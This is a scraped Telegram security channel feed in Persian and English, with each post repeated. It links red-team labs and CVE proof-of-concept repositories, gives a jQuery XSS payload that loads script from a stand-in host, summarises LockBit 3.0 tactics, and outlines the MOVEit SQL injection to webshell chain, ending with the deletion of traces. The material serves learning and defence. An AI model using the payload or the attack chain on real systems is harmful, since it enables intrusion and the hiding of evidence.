The Red Team Playground is a #Dockerized vulnerable testing lab for learning and practicing #RedTeam concepts.
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc).
https://github.com/minispooner/red-team-playground
@Engineer_Computer
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc).
https://github.com/minispooner/red-team-playground
@Engineer_Computer
GitHub
GitHub - minispooner/red-team-playground: Docker network containing many vulnerable targets for practicing Red Teaming concepts…
Docker network containing many vulnerable targets for practicing Red Teaming concepts (initial access, priv esc, persistence, lateral, C2, evasion, etc). - minispooner/red-team-playground
Privacy: Apple 🍎 Updates AirTags After Stalking Fears.
https://packetstormsecurity.com/news/view/32353/Apple-Updates-AirTags-After-Stalking-Fears.html
Proof of Concept Code for CVE-2023-32353: Local privilege escalation via iTunes in Windows.
https://github.com/86x/CVE-2023-32353-PoC
@Engineer_Computer
https://packetstormsecurity.com/news/view/32353/Apple-Updates-AirTags-After-Stalking-Fears.html
Proof of Concept Code for CVE-2023-32353: Local privilege escalation via iTunes in Windows.
https://github.com/86x/CVE-2023-32353-PoC
@Engineer_Computer
BBC News
Apple updates AirTags after stalking fears
Critics say the miniature trackers could be used to secretly monitor people's location.
Bug Bounty Hint
Is your JS payload limited to only 44 symbols?
Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.
$('<script src=//dom.xss>').appendTo('body')
@Engineer_Computer
Is your JS payload limited to only 44 symbols?
Check if the website uses jQuery. This could help you execute your external JS, increasing your impact by providing an extended PoC.
$('<script src=//dom.xss>').appendTo('body')
@Engineer_Computer
CVE-2023-23924: Dompdf up to 2.0.1 on PHP7 SVG Parser deserialization restoring in RCE.
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.
@Engineer_Computer
To exploit CVE-2023-23924. An SVG contacting image tag with capitalized letters is sufficient.
@Engineer_Computer
Bug Bounty Tip
Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.
Search:
window.addEventListener("message"
Inspect those events for potential XSS
@Engineer_Computer
Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.
Search:
window.addEventListener("message"
Inspect those events for potential XSS
@Engineer_Computer
Drone Security and Fault _ IOactive.pdf
1.6 MB
🔴 Drone Security and Fault Injection Attacks
🔴 هک پهپاد با تکنیک EMFI
محققای IOActive ، یه تحقیقی روی پهپادها انجام دادن و متوجه شدن که اغلبشون پتاسیل هک در برابر حملات EMFI رو دارن.
https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf
https://www.securityweek.com/new-research-shows-potential-of-electromagnetic-fault-injection-attacks-against-drones/
@Engineer_Computer
🔴 هک پهپاد با تکنیک EMFI
محققای IOActive ، یه تحقیقی روی پهپادها انجام دادن و متوجه شدن که اغلبشون پتاسیل هک در برابر حملات EMFI رو دارن.
https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf
https://www.securityweek.com/new-research-shows-potential-of-electromagnetic-fault-injection-attacks-against-drones/
@Engineer_Computer
#استخدام
بانک تجارت و شرکتهای تابعهش تو زمینه های زیر با سطح تخصص کارشناس / مدیر پروژه نیرو میگیره:
1. NOC/ پایش
2. SOC / CSIRT
علاقمندان رزومهشون رو به ایمیل زیر ارسال کنند:
[email protected]
@Engineer_Computer
بانک تجارت و شرکتهای تابعهش تو زمینه های زیر با سطح تخصص کارشناس / مدیر پروژه نیرو میگیره:
1. NOC/ پایش
2. SOC / CSIRT
علاقمندان رزومهشون رو به ایمیل زیر ارسال کنند:
[email protected]
@Engineer_Computer
#Ransomware #LockBit 3.0
باج افزار LockBit تا کنون مبلغی بیش از 100 میلیون دلار توانسته باج گیری رایانه ای کنه که عموما از ارگان های دولتی آمریکا، چین، هند، فرانسه، آلمان، اوکراین و اندونزی رو درگیر کرده و جالب است که با سرور هایی که زبان های روسی، رومانی، عربی سوری تنظیم داشتند، کاری نداشته است.
اما رفتار های شاخص تکنیکی تاکتیکی این باج افزار چی مواردی است؟ نسخه 3 این باج افزار برای ایجاد دسترسی از تکنیک های Bruteforce پروتکل RDP ، تکنیک Drive-By Compromise و Spear Phishing و دسترسی به حساب های کاربری صحیح و همچنین بهره برداری از یک آسیب پذیری سرویس های fortinet بوده است.
اما برای Exfiltration عموما از وبسرویس های اشتراک گذاری فایل استفاده شده که فایل های مورد نیاز باج افزار رو به سیستم قربانی انتقال خواهد داد.
استفاده از Autostart Execution ها برای ارتقاء سطح دسترسی که معمولا با schtasks انجام میشه، استفاده از Obfuscation کد برای نامحسوس سازی PE باج افزار، خاموش کردن سرویس های امنیتی سیستم عامل، گرفتن Dump از LSASS بر بستر حافظه و مواردی دیگر، اطلاعات تکمیلی در این مقاله است.
@Engineer_Computer
باج افزار LockBit تا کنون مبلغی بیش از 100 میلیون دلار توانسته باج گیری رایانه ای کنه که عموما از ارگان های دولتی آمریکا، چین، هند، فرانسه، آلمان، اوکراین و اندونزی رو درگیر کرده و جالب است که با سرور هایی که زبان های روسی، رومانی، عربی سوری تنظیم داشتند، کاری نداشته است.
اما رفتار های شاخص تکنیکی تاکتیکی این باج افزار چی مواردی است؟ نسخه 3 این باج افزار برای ایجاد دسترسی از تکنیک های Bruteforce پروتکل RDP ، تکنیک Drive-By Compromise و Spear Phishing و دسترسی به حساب های کاربری صحیح و همچنین بهره برداری از یک آسیب پذیری سرویس های fortinet بوده است.
اما برای Exfiltration عموما از وبسرویس های اشتراک گذاری فایل استفاده شده که فایل های مورد نیاز باج افزار رو به سیستم قربانی انتقال خواهد داد.
استفاده از Autostart Execution ها برای ارتقاء سطح دسترسی که معمولا با schtasks انجام میشه، استفاده از Obfuscation کد برای نامحسوس سازی PE باج افزار، خاموش کردن سرویس های امنیتی سیستم عامل، گرفتن Dump از LSASS بر بستر حافظه و مواردی دیگر، اطلاعات تکمیلی در این مقاله است.
@Engineer_Computer
WSTG.pdf
17.3 MB
کتاب فارسی WSTG
استاندارد جامعی که اغلب در فرآیند تست نفوذ وب مورد استفاده قرار می گیرد، استاندارد WSTG یا Web Security Testing Guide است.
نویسنده : مهندس نیک آور
@Engineer_Computer
استاندارد جامعی که اغلب در فرآیند تست نفوذ وب مورد استفاده قرار می گیرد، استاندارد WSTG یا Web Security Testing Guide است.
نویسنده : مهندس نیک آور
@Engineer_Computer
👍1
Media is too big
VIEW IN TELEGRAM
⭕️ مستند تحقیقی الجزیره: عملیات "هک بزرگ" زیرو کلیک
اولین بار برنامه جاسوسی اسرائیل «پگاسوس» در سال ۲۰۱۶ برای نفوذ به تلفن «احمد منصور» فعال اماراتی استفاده شد و در نتیجه این عملیات احمد منصور تا به امروز در زندان به سر میبرد.
«بیل مارزال» کارشناس آزمایشگاه «سیتزن لاب» در خصوص چگونگی هک شدن منصور میگوید که این فعال اماراتی پیامهای کوتاهی از شمارههای ناشناس دریافت میکرد که به آنها مشکوک بود که این پیامها برای نصب نرمافزار جاسوسی بر روی تلفن همراه وی ارسال میشد.
«کوبر کوینتون» کارشناس امنیت سایبری اعلام کرد که گوشیهای کارمندان شبکه الجزیره بین ماههای جولای و آگوست به سرورهایی متصل است که توسط «ان اس او» یک شرکت فناوری در اسرائیل برای تحویل نرم افزارهای جاسوسی #پگاسوس استفاده میشود.
@Engineer_Computer
اولین بار برنامه جاسوسی اسرائیل «پگاسوس» در سال ۲۰۱۶ برای نفوذ به تلفن «احمد منصور» فعال اماراتی استفاده شد و در نتیجه این عملیات احمد منصور تا به امروز در زندان به سر میبرد.
«بیل مارزال» کارشناس آزمایشگاه «سیتزن لاب» در خصوص چگونگی هک شدن منصور میگوید که این فعال اماراتی پیامهای کوتاهی از شمارههای ناشناس دریافت میکرد که به آنها مشکوک بود که این پیامها برای نصب نرمافزار جاسوسی بر روی تلفن همراه وی ارسال میشد.
«کوبر کوینتون» کارشناس امنیت سایبری اعلام کرد که گوشیهای کارمندان شبکه الجزیره بین ماههای جولای و آگوست به سرورهایی متصل است که توسط «ان اس او» یک شرکت فناوری در اسرائیل برای تحویل نرم افزارهای جاسوسی #پگاسوس استفاده میشود.
@Engineer_Computer
CyberSecurity Interview Tips.pdf
2.8 MB
Cyber Security #Interview Tips
How to stand out, get hired and advance your career.
@Engineer_Computer
How to stand out, get hired and advance your career.
@Engineer_Computer
👍1
CVE-2023-29343
This is PoC for arbitrary file write bug in Sysmon version 14.14
https://github.com/Wh04m1001/CVE-2023-29343
@Engineer_Computer
This is PoC for arbitrary file write bug in Sysmon version 14.14
https://github.com/Wh04m1001/CVE-2023-29343
@Engineer_Computer
GitHub
GitHub - Wh04m1001/CVE-2023-29343
Contribute to Wh04m1001/CVE-2023-29343 development by creating an account on GitHub.
Media is too big
VIEW IN TELEGRAM
#MOVEit #Transfer #SQLi
اخیرا دو آسیب پذیری ثبت شده با شناسه های CVE-2023-34362 و CVE-2023-35036 که از نوع Unauthenticated SQLi بوده است که به شرح زیر میباشد:
اول: پیدا کردن CSRF Token، دریافت Cookie از نقطه انتهایی guestaccess.aspx، تنظیم session قرار دادن پیلود SQL در پارامتر MyPkgSelfProvisionedRecips هدر Cookie، ساخت رمز با Salt منطبق با پایگاه داده.
دوم: ایجاد کاربر sysadmin در پایگاه داده و تنظیم رمز از قبل طراحی شده و اعطا دسترسی پایگاه داده.
سوم: گرفتن API Token از Endpoint مربوطه.
چهارم: پیدا کردن ID پوشه هدف بارگزاری ها.
پنجم: آپلود فایل Webshell بواسطه دسترسی به .API
هفتم: فاش کردن کلید رمزنگاری بخش Standard Networks\siLock\Institutions برای ارتباط یکی از پارامتر های API
هشتم: ایجاد یک Deserialization Gadget که دارای پبلود ایجاد یک Process بر روی سیستم عامل است.
نهم: این Gadget در پایگاه داده و فایل آپلودی در فیلد file_jason بروز رسانی میشه.
دهم: ارتباط با فایل از طریق API گرفته میشه و Gadget قرار داده شده در فایل اجرا میشه.
یازدهم: نشانه های IoC از روی پایگاه داده حذف میشود.
اخیرا دو آسیب پذیری ثبت شده با شناسه های CVE-2023-34362 و CVE-2023-35036 که از نوع Unauthenticated SQLi بوده است که به شرح زیر میباشد:
اول: پیدا کردن CSRF Token، دریافت Cookie از نقطه انتهایی guestaccess.aspx، تنظیم session قرار دادن پیلود SQL در پارامتر MyPkgSelfProvisionedRecips هدر Cookie، ساخت رمز با Salt منطبق با پایگاه داده.
دوم: ایجاد کاربر sysadmin در پایگاه داده و تنظیم رمز از قبل طراحی شده و اعطا دسترسی پایگاه داده.
سوم: گرفتن API Token از Endpoint مربوطه.
چهارم: پیدا کردن ID پوشه هدف بارگزاری ها.
پنجم: آپلود فایل Webshell بواسطه دسترسی به .API
هفتم: فاش کردن کلید رمزنگاری بخش Standard Networks\siLock\Institutions برای ارتباط یکی از پارامتر های API
هشتم: ایجاد یک Deserialization Gadget که دارای پبلود ایجاد یک Process بر روی سیستم عامل است.
نهم: این Gadget در پایگاه داده و فایل آپلودی در فیلد file_jason بروز رسانی میشه.
دهم: ارتباط با فایل از طریق API گرفته میشه و Gadget قرار داده شده در فایل اجرا میشه.
یازدهم: نشانه های IoC از روی پایگاه داده حذف میشود.
🔥1